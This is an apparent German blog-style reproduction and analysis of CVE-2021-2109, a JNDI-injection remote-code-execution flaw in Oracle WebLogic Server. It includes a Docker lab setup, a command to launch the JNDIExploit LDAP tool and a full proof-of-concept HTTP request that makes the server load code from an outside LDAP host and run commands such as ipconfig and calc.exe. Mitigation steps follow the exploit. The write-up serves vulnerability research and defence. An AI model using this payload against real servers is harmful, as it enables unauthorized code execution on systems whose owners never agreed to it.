
CVE-2021-2109 Weblogic Server Remote-Code-Execution-Schwachstelle: Reproduktion und Analyse
Im Januar 2021 veröffentlichte Oracle Sicherheitsupdates, darunter 329 neue Sicherheitspatches in der Oracle-Produktfamilie. In dieser Ankündigung wurde insbesondere das am 1. November 2020 veröffentlichte Sicherheitsbulletin zu Oracle WebLogic Server bezüglich der Schwachstelle CVE-2020-14750 erwähnt. Kunden wird dringend empfohlen, dieses Patch-Update sowie die anderen Patches aus dieser Ankündigung anzuwenden. Die CVE-Nummer CVE-2021-2109 betrifft eine Remote-Code-Execution-Schwachstelle in Weblogic. Die Schwachstelle wird hauptsächlich durch JNDI-Injection verursacht, wodurch Angreifer Remote-Code-Execution ausführen können.
Betroffene Versionen: Weblogic Server 10.3.6.0.0 Weblogic Server 12.1.3.0.0 Weblogic Server 12.2.1.3.0 Weblogic Server 12.2.1.4.0 Weblogic Server 14.1.1.0.0
Verwenden Sie DOCKER, um die Weblogic-Server-Testumgebung aufzubauen; der Weblogic-Server ist normal erreichbar.


Starten Sie LDAP auf dem lokalen Rechner; es kann unter https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11 heruntergeladen werden. Der Befehl lautet: java -jar JNDIExploit-v1.11.jar -i 192.168.131.1

Senden Sie das POC-Paket für die JNDI-Injection der Weblogic-Server-Remote-Code-Execution-Schwachstelle CVE-2021-2109: POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

Führen Sie den Systembefehl ipconfig über die cmd-Variable aus.


Führen Sie über die cmd-Variable calc.exe aus, um den Systemrechner zu öffnen.


Der Systemrechner wird geöffnet.

Sicherheitsempfehlungen für die CVE-2021-2109 Weblogic Server Remote-Code-Execution-Schwachstelle
T3-Protokoll deaktivieren Wenn Sie für die JVM-Kommunikation nicht auf das T3-Protokoll angewiesen sind, können Sie die Auswirkungen dieser Schwachstelle durch vorübergehendes Blockieren des T3-Protokolls abmildern. 1). Gehen Sie zur Weblogic-Konsole, öffnen Sie auf der Konfigurationsseite von base_domain den Reiter „Sicherheit“, klicken Sie auf „Filter“ und konfigurieren Sie den Filter. 2). Geben Sie im Verbindungsfilter ein: weblogic.security.net.ConnectionFilterImpl, und geben Sie im Feld für Verbindungsfilterregeln ein: * * 7001 deny t3 t3s.
IIOP nicht aktivieren Melden Sie sich an der Weblogic-Konsole an, suchen Sie die Option „IIOP aktivieren“, deaktivieren Sie das Kontrollkästchen, und starten Sie den Dienst neu, damit die Änderung wirksam wird.
Den externen Zugriff auf das Backend /console/console.portal vorübergehend deaktivieren
Offizielle Sicherheitspatches installieren